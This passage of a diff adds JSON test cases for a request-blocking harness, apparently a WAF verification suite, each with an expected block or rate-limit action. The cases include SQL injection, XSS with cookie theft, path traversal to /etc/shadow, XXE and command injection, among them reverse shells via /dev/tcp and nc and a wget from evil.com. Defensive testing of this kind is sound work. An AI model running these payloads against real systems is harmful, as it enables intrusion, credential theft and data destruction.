+ "expectedAction": "temporary_block",
1033
+ "method": "GET",
1034
+ "url": "/docker-compose.yml",
1035
+ "headers": {
1036
+ "user-agent": "AttackVerificationHarness/2.0"
1037
+ }
1038
+ },
1039
+ {
1040
+ "id": "ATK-SECR-089",
1041
+ "category": "SECRET_PROBE",
1042
+ "severity": "high",
1043
+ "expectedAction": "temporary_block",
1044
+ "method": "GET",
1045
+ "url": "/admin/debug",
1046
+ "headers": {
1047
+ "user-agent": "AttackVerificationHarness/2.0"
1048
+ }
1049
+ },
1050
+ {
1051
+ "id": "ATK-SECR-090",
1052
+ "category": "SECRET_PROBE",
1053
+ "severity": "critical",
1054
+ "expectedAction": "blocked",
1055
+ "method": "GET",
1056
+ "url": "/internal/secrets",
1057
+ "headers": {
1058
+ "user-agent": "AttackVerificationHarness/2.0"
1059
+ }
1060
+ },
1061
+ {
1062
+ "id": "ATK-SECR-091",
1063
+ "category": "SECRET_PROBE",
1064
+ "severity": "critical",
1065
+ "expectedAction": "blocked",
1066
+ "method": "GET",
1067
+ "url": "/app/config/.env.local",
1068
+ "headers": {
1069
+ "user-agent": "AttackVerificationHarness/2.0"
1070
+ }
1071
+ },
1072
+ {
1073
+ "id": "ATK-SECR-092",
1074
+ "category": "SECRET_PROBE",
1075
+ "severity": "high",
1076
+ "expectedAction": "temporary_block",
1077
+ "method": "GET",
1078
+ "url": "/.git/HEAD",
1079
+ "headers": {
1080
+ "user-agent": "AttackVerificationHarness/2.0"
1081
+ }
1082
+ },
1083
+ {
1084
+ "id": "ATK-BRUT-093",
1085
+ "category": "BRUTE_FORCE",
1086
+ "severity": "medium",
1087
+ "expectedAction": "rate_limited",
1088
+ "method": "POST",
1089
+ "url": "/api/login",
1090
+ "headers": {
1091
+ "user-agent": "AttackVerificationHarness/2.0",
1092
+ "x-forwarded-for": "198.51.100.99"
1093
+ },
1094
+ "body": {
1095
+ "username": "admin",
1096
+ "password": "wrong_password_1"
1097
+ }
1098
+ },
1099
+ {
1100
+ "id": "ATK-BRUT-094",
1101
+ "category": "BRUTE_FORCE",
1102
+ "severity": "medium",
1103
+ "expectedAction": "rate_limited",
1104
+ "method": "POST",
1105
+ "url": "/api/login",
1106
+ "headers": {
1107
+ "user-agent": "AttackVerificationHarness/2.0",
1108
+ "x-forwarded-for": "198.51.100.99"
1109
+ },
1110
+ "body": {
1111
+ "username": "admin",
1112
+ "password": "wrong_password_2"
1113
+ }
1114
+ },
1115
+ {
1116
+ "id": "ATK-BRUT-095",
1117
+ "category": "BRUTE_FORCE",
1118
+ "severity": "medium",
1119
+ "expectedAction": "rate_limited",
1120
+ "method": "POST",
1121
+ "url": "/api/login",
1122
+ "headers": {
1123
+ "user-agent": "AttackVerificationHarness/2.0",
1124
+ "x-forwarded-for": "198.51.100.99"
1125
+ },
1126
+ "body": {
1127
+ "username": "admin",
1128
+ "password": "wrong_password_3"
1129
+ }
1130
+ },
1131
+ {
1132
+ "id": "ATK-BRUT-096",
1133
+ "category": "BRUTE_FORCE",
1134
+ "severity": "medium",
1135
+ "expectedAction": "rate_limited",
1136
+ "method": "POST",
1137
+ "url": "/api/auth/signin",
1138
+ "headers": {
1139
+ "user-agent": "AttackVerificationHarness/2.0",
1140
+ "x-forwarded-for": "198.51.100.99"
1141
+ },
1142
+ "body": {
1143
+ "user": "root",
1144
+ "pass": "123456"
1145
+ }
1146
+ },
1147
+ {
1148
+ "id": "ATK-BRUT-097",
1149
+ "category": "BRUTE_FORCE",
1150
+ "severity": "high",
1151
+ "expectedAction": "temporary_block",
1152
+ "method": "POST",
1153
+ "url": "/api/auth/token",
1154
+ "headers": {
1155
+ "user-agent": "AttackVerificationHarness/2.0",
1156
+ "x-forwarded-for": "198.51.100.99"
1157
+ },
1158
+ "body": {
1159
+ "user": "admin",
1160
+ "pass": "admin123"
1161
+ }
1162
+ },
1163
+ {
1164
+ "id": "ATK-BRUT-098",
1165
+ "category": "BRUTE_FORCE",
1166
+ "severity": "medium",
1167
+ "expectedAction": "rate_limited",
1168
+ "method": "POST",
1169
+ "url": "/api/login",
1170
+ "headers": {
1171
+ "user-agent": "AttackVerificationHarness/2.0",
1172
+ "x-forwarded-for": "198.51.100.99"
1173
+ },
1174
+ "body": {
1175
+ "username": "superuser",
1176
+ "password": "bad"
1177
+ }
1178
+ },
1179
+ {
1180
+ "id": "ATK-BRUT-099",
1181
+ "category": "BRUTE_FORCE",
1182
+ "severity": "medium",
1183
+ "expectedAction": "rate_limited",
1184
+ "method": "POST",
1185
+ "url": "/api/auth/signin",
1186
+ "headers": {
1187
+ "user-agent": "AttackVerificationHarness/2.0",
1188
+ "x-forwarded-for": "198.51.100.99"
1189
+ },
1190
+ "body": {
1191
+ "username": "moderator",
1192
+ "password": "invalid"
1193
+ }
1194
+ },
1195
+ {
1196
+ "id": "ATK-BRUT-100",
1197
+ "category": "BRUTE_FORCE",
1198
+ "severity": "high",
1199
+ "expectedAction": "temporary_block",
1200
+ "method": "POST",
1201
+ "url": "/api/login",
1202
+ "headers": {
1203
+ "user-agent": "AttackVerificationHarness/2.0",
1204
+ "x-forwarded-for": "198.51.100.99"
1205
+ },
1206
+ "body": {
1207
+ "username": "admin",
1208
+ "password": "password2024"
1209
+ }
1210
+ },
1211
+ {
1212
+ "id": "ATK-XXE-101",
1213
+ "category": "XXE",
1214
+ "severity": "critical",
1215
+ "expectedAction": "blocked",
1216
+ "method": "POST",
1217
+ "url": "/api/xml",
1218
+ "headers": {
1219
+ "content-type": "application/xml"
1220
+ },
1221
+ "body": "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>"
1222
+ },
1223
+ {
1224
+ "id": "ATK-XXE-102",
1225
+ "category": "XXE",
1226
+ "severity": "critical",
1227
+ "expectedAction": "blocked",
1228
+ "method": "POST",
1229
+ "url": "/api/parse-xml",
1230
+ "headers": {
1231
+ "content-type": "application/xml"
1232
+ },
1233
+ "body": "<!DOCTYPE test [ <!ENTITY % init SYSTEM \"https://evil.com/eval.dtd\"> %init; ]>"
1234
+ },
1235
+ {
1236
+ "id": "ATK-XXE-103",
1237
+ "category": "XXE",
1238
+ "severity": "critical",
1239
+ "expectedAction": "blocked",
1240
+ "method": "POST",
1241
+ "url": "/api/data",
1242
+ "headers": {
1243
+ "content-type": "text/xml"
1244
+ },
1245
+ "body": "<!ENTITY % dtd SYSTEM \"file:///c:/boot.ini\">"
1246
+ },
1247
+ {
1248
+ "id": "ATK-XXE-104",
1249
+ "category": "XXE",
1250
+ "severity": "critical",
1251
+ "expectedAction": "blocked",
1252
+ "method": "POST",
1253
+ "url": "/api/xml-import",
1254
+ "headers": {
1255
+ "content-type": "application/xml"
1256
+ },
1257
+ "body": "<!DOCTYPE r [ <!ELEMENT r ANY ><!ENTITY sp SYSTEM \"http://127.0.0.1:8080/secret\"> ]><r>&sp;</r>"
1258
+ },
1259
+ {
1260
+ "id": "ATK-LDAP-105",
1261
+ "category": "LDAP_INJECTION",
1262
+ "severity": "high",
1263
+ "expectedAction": "temporary_block",
1264
+ "method": "GET",
1265
+ "url": "/api/ldap?user=*)(uid=*))(|(uid=*",
1266
+ "headers": {
1267
+ "user-agent": "AttackVerificationHarness/2.0"
1268
+ }
1269
+ },
1270
+ {
1271
+ "id": "ATK-LDAP-106",
1272
+ "category": "LDAP_INJECTION",
1273
+ "severity": "high",
1274
+ "expectedAction": "temporary_block",
1275
+ "method": "GET",
1276
+ "url": "/api/search?filter=(|(mail=*)(description=*))",
1277
+ "headers": {
1278
+ "user-agent": "AttackVerificationHarness/2.0"
1279
+ }
1280
+ },
1281
+ {
1282
+ "id": "ATK-LDAP-107",
1283
+ "category": "LDAP_INJECTION",
1284
+ "severity": "high",
1285
+ "expectedAction": "temporary_block",
1286
+ "method": "GET",
1287
+ "url": "/api/find?user=admin)(&)",
1288
+ "headers": {
1289
+ "user-agent": "AttackVerificationHarness/2.0"
1290
+ }
1291
+ },
1292
+ {
1293
+ "id": "ATK-LDAP-108",
1294
+ "category": "LDAP_INJECTION",
1295
+ "severity": "high",
1296
+ "expectedAction": "temporary_block",
1297
+ "method": "GET",
1298
+ "url": "/api/query?dept=Engineering)(|(objectclass=*)",
1299
+ "headers": {
1300
+ "user-agent": "AttackVerificationHarness/2.0"
1301
+ }
1302
+ },
1303
+ {
1304
+ "id": "ATK-OPEN-109",
1305
+ "category": "OPEN_REDIRECT",
1306
+ "severity": "medium",
1307
+ "expectedAction": "rate_limited",
1308
+ "method": "GET",
1309
+ "url": "/api/auth/callback?redirect=http://evil-phishing.com/login",
1310
+ "headers": {
1311
+ "user-agent": "AttackVerificationHarness/2.0"
1312
+ }
1313
+ },
1314
+ {
1315
+ "id": "ATK-OPEN-110",
1316
+ "category": "OPEN_REDIRECT",
1317
+ "severity": "medium",
1318
+ "expectedAction": "rate_limited",
1319
+ "method": "GET",
1320
+ "url": "/api/logout?return_url=https://attacker-domain.org",
1321
+ "headers": {
1322
+ "user-agent": "AttackVerificationHarness/2.0"
1323
+ }
1324
+ },
1325
+ {
1326
+ "id": "ATK-OPEN-111",
1327
+ "category": "OPEN_REDIRECT",
1328
+ "severity": "medium",
1329
+ "expectedAction": "rate_limited",
1330
+ "method": "GET",
1331
+ "url": "/api/nav?next=https://malicious-site.io/download",
1332
+ "headers": {
1333
+ "user-agent": "AttackVerificationHarness/2.0"
1334
+ }
1335
+ },
1336
+ {
1337
+ "id": "ATK-OPEN-112",
1338
+ "category": "OPEN_REDIRECT",
1339
+ "severity": "medium",
1340
+ "expectedAction": "rate_limited",
1341
+ "method": "GET",
1342
+ "url": "/api/goto?destination=http://fake-portal.com",
1343
+ "headers": {
1344
+ "user-agent": "AttackVerificationHarness/2.0"
1345
+ }
1346
+ },
1347
+ {
1348
+ "id": "ATK-HEAD-113",
1349
+ "category": "HEADER_INJECTION",
1350
+ "severity": "high",
1351
+ "expectedAction": "temporary_block",
1352
+ "method": "GET",
1353
+ "url": "/api/test",
1354
+ "headers": {
1355
+ "x-forwarded-for": "10.0.0.1%0d%0aSet-Cookie: admin=true"
1356
+ }
1357
+ },
1358
+ {
1359
+ "id": "ATK-HEAD-114",
1360
+ "category": "HEADER_INJECTION",
1361
+ "severity": "high",
1362
+ "expectedAction": "temporary_block",
1363
+ "method": "GET",
1364
+ "url": "/api/log",
1365
+ "headers": {
1366
+ "referer": "http://site.com\r\nX-Injected-Header: evil"
1367
+ }
1368
+ },
1369
+ {
1370
+ "id": "ATK-HEAD-115",
1371
+ "category": "HEADER_INJECTION",
1372
+ "severity": "high",
1373
+ "expectedAction": "temporary_block",
1374
+ "method": "GET",
1375
+ "url": "/api/track?url=test%0a%0dInjected:1",
1376
+ "headers": {
1377
+ "user-agent": "AttackVerificationHarness/2.0"
1378
+ }
1379
+ },
1380
+ {
1381
+ "id": "ATK-BASE-116",
1382
+ "category": "BASE64_PAYLOAD",
1383
+ "severity": "medium",
1384
+ "expectedAction": "rate_limited",
1385
+ "method": "GET",
1386
+ "url": "/api/exec?data=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo=",
1387
+ "headers": {
1388
+ "user-agent": "AttackVerificationHarness/2.0"
1389
+ }
1390
+ },
1391
+ {
1392
+ "id": "ATK-BASE-117",
1393
+ "category": "BASE64_PAYLOAD",
1394
+ "severity": "high",
1395
+ "expectedAction": "temporary_block",
1396
+ "method": "GET",
1397
+ "url": "/api/payload?raw=JyBPUiAxPTE7LS0gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
1398
+ "headers": {
1399
+ "user-agent": "AttackVerificationHarness/2.0"
1400
+ }
1401
+ },
1402
+ {
1403
+ "id": "ATK-VAR-118",
1404
+ "category": "XSS",
1405
+ "severity": "high",
1406
+ "expectedAction": "temporary_block",
1407
+ "method": "GET",
1408
+ "url": "/api/feedback?text=javascript:alert(1)&variation=119",
1409
+ "headers": {
1410
+ "user-agent": "AttackVerificationHarness/2.0"
1411
+ }
1412
+ },
1413
+ {
1414
+ "id": "ATK-VAR-119",
1415
+ "category": "XSS",
1416
+ "severity": "high",
1417
+ "expectedAction": "temporary_block",
1418
+ "method": "GET",
1419
+ "url": "/api/view?name=<svg onload=alert('XSS')>&variation=120",
1420
+ "headers": {
1421
+ "user-agent": "AttackVerificationHarness/2.0"
1422
+ }
1423
+ },
1424
+ {
1425
+ "id": "ATK-VAR-120",
1426
+ "category": "XSS",
1427
+ "severity": "high",
1428
+ "expectedAction": "temporary_block",
1429
+ "method": "POST",
1430
+ "url": "/api/items?v=121",
1431
+ "headers": {
1432
+ "user-agent": "AttackVerificationHarness/2.0"
1433
+ },
1434
+ "body": {
1435
+ "desc": "<iframe src=javascript:document.cookie>"
1436
+ }
1437
+ },
1438
+ {
1439
+ "id": "ATK-VAR-121",
1440
+ "category": "XSS",
1441
+ "severity": "high",
1442
+ "expectedAction": "temporary_block",
1443
+ "method": "GET",
1444
+ "url": "/api/render?html=<body onload=eval(atob('ZG9jdW1lbnQud3JpdGUoMSk='))>&variation=122",
1445
+ "headers": {
1446
+ "user-agent": "AttackVerificationHarness/2.0"
1447
+ }
1448
+ },
1449
+ {
1450
+ "id": "ATK-VAR-122",
1451
+ "category": "XSS",
1452
+ "severity": "medium",
1453
+ "expectedAction": "rate_limited",
1454
+ "method": "POST",
1455
+ "url": "/api/post?v=123",
1456
+ "headers": {
1457
+ "user-agent": "AttackVerificationHarness/2.0"
1458
+ },
1459
+ "body": {
1460
+ "content": "<div onclick=\"document.write('hacked')\">"
1461
+ }
1462
+ },
1463
+ {
1464
+ "id": "ATK-VAR-123",
1465
+ "category": "XSS",
1466
+ "severity": "high",
1467
+ "expectedAction": "temporary_block",
1468
+ "method": "GET",
1469
+ "url": "/api/user?name=<input onfocus=alert(1) autofocus>&variation=124",
1470
+ "headers": {
1471
+ "user-agent": "AttackVerificationHarness/2.0"
1472
+ }
1473
+ },
1474
+ {
1475
+ "id": "ATK-VAR-124",
1476
+ "category": "XSS",
1477
+ "severity": "medium",
1478
+ "expectedAction": "rate_limited",
1479
+ "method": "GET",
1480
+ "url": "/api/echo?s=document.cookie&variation=125",
1481
+ "headers": {
1482
+ "user-agent": "AttackVerificationHarness/2.0"
1483
+ }
1484
+ },
1485
+ {
1486
+ "id": "ATK-VAR-125",
1487
+ "category": "XSS",
1488
+ "severity": "critical",
1489
+ "expectedAction": "blocked",
1490
+ "method": "GET",
1491
+ "url": "/api/tag?t=<script src='http://evil.com/xss.js'></script>&variation=126",
1492
+ "headers": {
1493
+ "user-agent": "AttackVerificationHarness/2.0"
1494
+ }
1495
+ },
1496
+ {
1497
+ "id": "ATK-VAR-126",
1498
+ "category": "XSS",
1499
+ "severity": "critical",
1500
+ "expectedAction": "blocked",
1501
+ "method": "POST",
1502
+ "url": "/api/note?v=127",
1503
+ "headers": {
1504
+ "user-agent": "AttackVerificationHarness/2.0"
1505
+ },
1506
+ "body": {
1507
+ "note": "test<script>fetch('/stolen?c='+document.cookie)</script>"
1508
+ }
1509
+ },
1510
+ {
1511
+ "id": "ATK-VAR-127",
1512
+ "category": "XSS",
1513
+ "severity": "high",
1514
+ "expectedAction": "temporary_block",
1515
+ "method": "GET",
1516
+ "url": "/api/search?q=<a href='javascript:alert(1)'>click me</a>&variation=128",
1517
+ "headers": {
1518
+ "user-agent": "AttackVerificationHarness/2.0"
1519
+ }
1520
+ },
1521
+ {
1522
+ "id": "ATK-VAR-128",
1523
+ "category": "PATH_TRAVERSAL",
1524
+ "severity": "critical",
1525
+ "expectedAction": "blocked",
1526
+ "method": "GET",
1527
+ "url": "/api/download?file=../../../../etc/passwd&variation=129",
1528
+ "headers": {
1529
+ "user-agent": "AttackVerificationHarness/2.0"
1530
+ }
1531
+ },
1532
+ {
1533
+ "id": "ATK-VAR-129",
1534
+ "category": "PATH_TRAVERSAL",
1535
+ "severity": "critical",
1536
+ "expectedAction": "blocked",
1537
+ "method": "GET",
1538
+ "url": "/api/view?path=..%2F..%2F..%2Fwindows%2Fsystem32%2Fcmd.exe&variation=130",
1539
+ "headers": {
1540
+ "user-agent": "AttackVerificationHarness/2.0"
1541
+ }
1542
+ },
1543
+ {
1544
+ "id": "ATK-VAR-130",
1545
+ "category": "PATH_TRAVERSAL",
1546
+ "severity": "critical",
1547
+ "expectedAction": "blocked",
1548
+ "method": "GET",
1549
+ "url": "/api/read?file=../../../etc/shadow&variation=131",
1550
+ "headers": {
1551
+ "user-agent": "AttackVerificationHarness/2.0"
1552
+ }
1553
+ },
1554
+ {
1555
+ "id": "ATK-VAR-131",
1556
+ "category": "PATH_TRAVERSAL",
1557
+ "severity": "high",
1558
+ "expectedAction": "temporary_block",
1559
+ "method": "GET",
1560
+ "url": "/api/load?doc=..\\..\\..\\boot.ini&variation=132",
1561
+ "headers": {
1562
+ "user-agent": "AttackVerificationHarness/2.0"
1563
+ }
1564
+ },
1565
+ {
1566
+ "id": "ATK-VAR-132",
1567
+ "category": "PATH_TRAVERSAL",
1568
+ "severity": "critical",
1569
+ "expectedAction": "blocked",
1570
+ "method": "GET",
1571
+ "url": "/api/static?file=....//....//etc/passwd&variation=133",
1572
+ "headers": {
1573
+ "user-agent": "AttackVerificationHarness/2.0"
1574
+ }
1575
+ },
1576
+ {
1577
+ "id": "ATK-VAR-133",
1578
+ "category": "PATH_TRAVERSAL",
1579
+ "severity": "high",
1580
+ "expectedAction": "temporary_block",
1581
+ "method": "GET",
1582
+ "url": "/api/fetch?res=../../../../var/log/auth.log&variation=134",
1583
+ "headers": {
1584
+ "user-agent": "AttackVerificationHarness/2.0"
1585
+ }
1586
+ },
1587
+ {
1588
+ "id": "ATK-VAR-134",
1589
+ "category": "PATH_TRAVERSAL",
1590
+ "severity": "high",
1591
+ "expectedAction": "temporary_block",
1592
+ "method": "GET",
1593
+ "url": "/api/asset?img=../../../etc/hosts&variation=135",
1594
+ "headers": {
1595
+ "user-agent": "AttackVerificationHarness/2.0"
1596
+ }
1597
+ },
1598
+ {
1599
+ "id": "ATK-VAR-135",
1600
+ "category": "PATH_TRAVERSAL",
1601
+ "severity": "critical",
1602
+ "expectedAction": "blocked",
1603
+ "method": "GET",
1604
+ "url": "/api/files/download?f=../../../../app/.env&variation=136",
1605
+ "headers": {
1606
+ "user-agent": "AttackVerificationHarness/2.0"
1607
+ }
1608
+ },
1609
+ {
1610
+ "id": "ATK-VAR-136",
1611
+ "category": "PATH_TRAVERSAL",
1612
+ "severity": "high",
1613
+ "expectedAction": "temporary_block",
1614
+ "method": "GET",
1615
+ "url": "/api/docs?p=..%2F..%2F..%2Fetc%2Fgroup&variation=137",
1616
+ "headers": {
1617
+ "user-agent": "AttackVerificationHarness/2.0"
1618
+ }
1619
+ },
1620
+ {
1621
+ "id": "ATK-VAR-137",
1622
+ "category": "PATH_TRAVERSAL",
1623
+ "severity": "high",
1624
+ "expectedAction": "temporary_block",
1625
+ "method": "GET",
1626
+ "url": "/api/export?path=../../../../usr/local/etc/config&variation=138",
1627
+ "headers": {
1628
+ "user-agent": "AttackVerificationHarness/2.0"
1629
+ }
1630
+ },
1631
+ {
1632
+ "id": "ATK-VAR-138",
1633
+ "category": "COMMAND_INJECTION",
1634
+ "severity": "critical",
1635
+ "expectedAction": "blocked",
1636
+ "method": "GET",
1637
+ "url": "/api/ping?host=127.0.0.1; cat /etc/passwd&variation=139",
1638
+ "headers": {
1639
+ "user-agent": "AttackVerificationHarness/2.0"
1640
+ }
1641
+ },
1642
+ {
1643
+ "id": "ATK-VAR-139",
1644
+ "category": "COMMAND_INJECTION",
1645
+ "severity": "critical",
1646
+ "expectedAction": "blocked",
1647
+ "method": "GET",
1648
+ "url": "/api/dns?domain=google.com && whoami&variation=140",
1649
+ "headers": {
1650
+ "user-agent": "AttackVerificationHarness/2.0"
1651
+ }
1652
+ },
1653
+ {
1654
+ "id": "ATK-VAR-140",
1655
+ "category": "COMMAND_INJECTION",
1656
+ "severity": "critical",
1657
+ "expectedAction": "blocked",
1658
+ "method": "GET",
1659
+ "url": "/api/test?cmd=127.0.0.1 | ls -la&variation=141",
1660
+ "headers": {
1661
+ "user-agent": "AttackVerificationHarness/2.0"
1662
+ }
1663
+ },
1664
+ {
1665
+ "id": "ATK-VAR-141",
1666
+ "category": "COMMAND_INJECTION",
1667
+ "severity": "critical",
1668
+ "expectedAction": "blocked",
1669
+ "method": "POST",
1670
+ "url": "/api/exec?v=142",
1671
+ "headers": {
1672
+ "user-agent": "AttackVerificationHarness/2.0"
1673
+ },
1674
+ "body": {
1675
+ "command": "test `id`"
1676
+ }
1677
+ },
1678
+ {
1679
+ "id": "ATK-VAR-142",
1680
+ "category": "COMMAND_INJECTION",
1681
+ "severity": "critical",
1682
+ "expectedAction": "blocked",
1683
+ "method": "GET",
1684
+ "url": "/api/network?ip=127.0.0.1; wget http://evil.com/malware.sh&variation=143",
1685
+ "headers": {
1686
+ "user-agent": "AttackVerificationHarness/2.0"
1687
+ }
1688
+ },
1689
+ {
1690
+ "id": "ATK-VAR-143",
1691
+ "category": "COMMAND_INJECTION",
1692
+ "severity": "critical",
1693
+ "expectedAction": "blocked",
1694
+ "method": "GET",
1695
+ "url": "/api/status?host=localhost; uname -a&variation=144",
1696
+ "headers": {
1697
+ "user-agent": "AttackVerificationHarness/2.0"
1698
+ }
1699
+ },
1700
+ {
1701
+ "id": "ATK-VAR-144",
1702
+ "category": "COMMAND_INJECTION",
1703
+ "severity": "critical",
1704
+ "expectedAction": "blocked",
1705
+ "method": "POST",
1706
+ "url": "/api/run?v=145",
1707
+ "headers": {
1708
+ "user-agent": "AttackVerificationHarness/2.0"
1709
+ },
1710
+ "body": {
1711
+ "script": "$(nc -e /bin/sh 10.0.0.1 4444)"
1712
+ }
1713
+ },
1714
+ {
1715
+ "id": "ATK-VAR-145",
1716
+ "category": "COMMAND_INJECTION",
1717
+ "severity": "critical",
1718
+ "expectedAction": "blocked",
1719
+ "method": "GET",
1720
+ "url": "/api/calc?expr=1; python -c 'import socket'&variation=146",
1721
+ "headers": {
1722
+ "user-agent": "AttackVerificationHarness/2.0"
1723
+ }
1724
+ },
1725
+ {
1726
+ "id": "ATK-VAR-146",
1727
+ "category": "COMMAND_INJECTION",
1728
+ "severity": "critical",
1729
+ "expectedAction": "blocked",
1730
+ "method": "GET",
1731
+ "url": "/api/service?name=app && id&variation=147",
1732
+ "headers": {
1733
+ "user-agent": "AttackVerificationHarness/2.0"
1734
+ }
1735
+ },
1736
+ {
1737
+ "id": "ATK-VAR-147",
1738
+ "category": "COMMAND_INJECTION",
1739
+ "severity": "critical",
1740
+ "expectedAction": "blocked",
1741
+ "method": "GET",
1742
+ "url": "/api/backup?dest=/tmp; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1&variation=148",
1743
+ "headers": {
1744
+ "user-agent": "AttackVerificationHarness/2.0"
1745
+ }
1746
+ },
1747
+ {
1748
+ "id": "ATK-VAR-148",
1749
+ "category": "SSTI",
1750
+ "severity": "high",
1751
+ "expectedAction": "temporary_block",
1752
+ "method": "GET",
1753
+ "url": "/api/render?template={{7*7}}&variation=149",
1754
+ "headers": {
1755
+ "user-agent": "AttackVerificationHarness/2.0"
1756
+ }
1757
+ },
1758
+ {
1759
+ "id": "ATK-VAR-149",
1760
+ "category": "SSTI",
1761
+ "severity": "high",
1762
+ "expectedAction": "temporary_block",
1763
+ "method": "GET",
1764
+ "url": "/api/greeting?name=${7*7}&variation=150",
1765
+ "headers": {
1766
+ "user-agent": "AttackVerificationHarness/2.0"
1767
+ }
1768
+ },
1769
+ {
1770
+ "id": "ATK-VAR-150",
1771
+ "category": "SSTI",
1772
+ "severity": "critical",
1773
+ "expectedAction": "blocked",
1774
+ "method": "GET",
1775
+ "url": "/api/page?tpl={{config.items()}}&variation=151",
1776
+ "headers": {
1777
+ "user-agent": "AttackVerificationHarness/2.0"
1778
+ }
1779
+ },
1780
+ {
1781
+ "id": "ATK-VAR-151",
1782
+ "category": "SQL_INJECTION",
1783
+ "severity": "critical",
1784
+ "expectedAction": "blocked",
1785
+ "method": "GET",
1786
+ "url": "/api/search?q=' OR '1'='1&variation=152",
1787
+ "headers": {
1788
+ "user-agent": "AttackVerificationHarness/2.0"
1789
+ }
1790
+ },
1791
+ {
1792
+ "id": "ATK-VAR-152",
1793
+ "category": "SQL_INJECTION",
1794
+ "severity": "critical",
1795
+ "expectedAction": "blocked",
1796
+ "method": "GET",
1797
+ "url": "/api/users?id=1 UNION SELECT null, username, password FROM users--&variation=153",
1798
+ "headers": {
1799
+ "user-agent": "AttackVerificationHarness/2.0"
1800
+ }
1801
+ },
1802
+ {
1803
+ "id": "ATK-VAR-153",
1804
+ "category": "SQL_INJECTION",
1805
+ "severity": "critical",
1806
+ "expectedAction": "blocked",
1807
+ "method": "GET",
1808
+ "url": "/api/items?cat=tech'; DROP TABLE products;--&variation=154",
1809
+ "headers": {
1810
+ "user-agent": "AttackVerificationHarness/2.0"
1811
+ }
1812
+ },
1813
+ {
1814
+ "id": "ATK-VAR-154",
1815
+ "category": "SQL_INJECTION",
1816
+ "severity": "critical",
1817
+ "expectedAction": "blocked",
1818
+ "method": "POST",
1819
+ "url": "/api/login?v=155",
1820
+ "headers": {
1821
+ "user-agent": "AttackVerificationHarness/2.0"
1822
+ },
1823
+ "body": {
1824
+ "username": "admin' --",
1825
+ "password": "pwd"
1826
+ }
1827
+ },
1828
+ {
1829
+ "id": "ATK-VAR-155",
1830
+ "category": "SQL_INJECTION",
1831
+ "severity": "critical",
1832
+ "expectedAction": "blocked",
1833
+ "method": "POST",
1834
+ "url": "/api/login?v=156",
1835
+ "headers": {
1836
+ "user-agent": "AttackVerificationHarness/2.0"
1837
+ },
1838
+ "body": {
1839
+ "username": "admin' OR 1=1 #",
1840
+ "password": "pwd"
1841
+ }
1842
+ },
1843
+ {
1844
+ "id": "ATK-VAR-156",
1845
+ "category": "SQL_INJECTION",
1846
+ "severity": "critical",
1847
+ "expectedAction": "blocked",
1848
+ "method": "GET",
1849
+ "url": "/api/query?sort=name; EXEC xp_cmdshell('dir')&variation=157",
1850
+ "headers": {
1851
+ "user-agent": "AttackVerificationHarness/2.0"
1852
+ }
1853
+ },
1854
+ {
1855
+ "id": "ATK-VAR-157",
1856
+ "category": "SQL_INJECTION",
1857
+ "severity": "critical",
1858
+ "expectedAction": "blocked",
1859
+ "method": "GET",
1860
+ "url": "/api/filter?val=%27%20OR%201%3D1--&variation=158",
1861
+ "headers": {
1862
+ "user-agent": "AttackVerificationHarness/2.0"
1863
+ }
1864
+ },
1865
+ {
1866
+ "id": "ATK-VAR-158",
1867
+ "category": "SQL_INJECTION",
1868
+ "severity": "high",
1869
+ "expectedAction": "temporary_block",
1870
+ "method": "GET",
1871
+ "url": "/api/check?code=' or 1=1&variation=159",
1872
+ "headers": {
1873
+ "user-agent": "AttackVerificationHarness/2.0"
1874
+ }
1875
+ },
1876
+ {
1877
+ "id": "ATK-VAR-159",
1878
+ "category": "SQL_INJECTION",
1879
+ "severity": "high",
1880
+ "expectedAction": "temporary_block",
1881
+ "method": "GET",
1882
+ "url": "/api/orders?status=active' AND 1=1--&variation=160",
1883
+ "headers": {
1884
+ "user-agent": "AttackVerificationHarness/2.0"
1885
+ }
1886
+ },
1887
+ {
1888
+ "id": "ATK-VAR-160",
1889
+ "category": "SQL_INJECTION",
1890
+ "severity": "high",
1891
+ "expectedAction": "temporary_block",
1892
+ "method": "POST",
1893
+ "url": "/api/data?v=161",
1894
+ "headers": {
1895
+ "user-agent": "AttackVerificationHarness/2.0"
1896
+ },
1897
+ "body": {
1898
+ "filter": "1' or 'a'='a"
1899
+ }
1900
+ },
1901
+ {
1902
+ "id": "ATK-VAR-161",
1903
+ "category": "SQL_INJECTION",
1904
+ "severity": "critical",
1905
+ "expectedAction": "blocked",
1906
+ "method": "GET",
1907
+ "url": "/api/records?filter=test' union select 1,2,3--&variation=162",
1908
+ "headers": {
1909
+ "user-agent": "AttackVerificationHarness/2.0"
1910
+ }
1911
+ },
1912
+ {
1913
+ "id": "ATK-VAR-162",
1914
+ "category": "SQL_INJECTION",
1915
+ "severity": "critical",
1916
+ "expectedAction": "blocked",
1917
+ "method": "GET",
1918
+ "url": "/api/audit?q=1; INSERT INTO users VALUES ('hacker','pwd')&variation=163",
1919
+ "headers": {
1920
+ "user-agent": "AttackVerificationHarness/2.0"
1921
+ }
1922
+ },
1923
+ {
1924
+ "id": "ATK-VAR-163",
1925
+ "category": "SQL_INJECTION",
1926
+ "severity": "critical",
1927
+ "expectedAction": "blocked",
1928
+ "method": "GET",
1929
+ "url": "/api/audit?q=1; DELETE FROM logs WHERE 1=1&variation=164",
1930
+ "headers": {
1931
+ "user-agent": "AttackVerificationHarness/2.0"
1932
+ }
1933
+ },
1934
+ {
1935
+ "id": "ATK-VAR-164",
1936
+ "category": "SQL_INJECTION",
1937
+ "severity": "critical",
1938
+ "expectedAction": "blocked",
1939
+ "method": "GET",
1940
+ "url": "/api/audit?q=1; UPDATE users SET role='admin' WHERE id=5&variation=165",
1941
+ "headers": {
1942
+ "user-agent": "AttackVerificationHarness/2.0"
1943
+ }
1944
+ },
1945
+ {
1946
+ "id": "ATK-VAR-165",
1947
+ "category": "SQL_INJECTION",
1948
+ "severity": "high",
1949
+ "expectedAction": "temporary_block",
1950
+ "method": "GET",
1951
+ "url": "/api/search?q=test%27%20and%201%3D1&variation=166",
1952
+ "headers": {
1953
+ "user-agent": "AttackVerificationHarness/2.0"
1954
+ }
1955
+ },
1956
+ {
1957
+ "id": "ATK-VAR-166",
1958
+ "category": "XSS",
1959
+ "severity": "high",
1960
+ "expectedAction": "temporary_block",
1961
+ "method": "GET",
1962
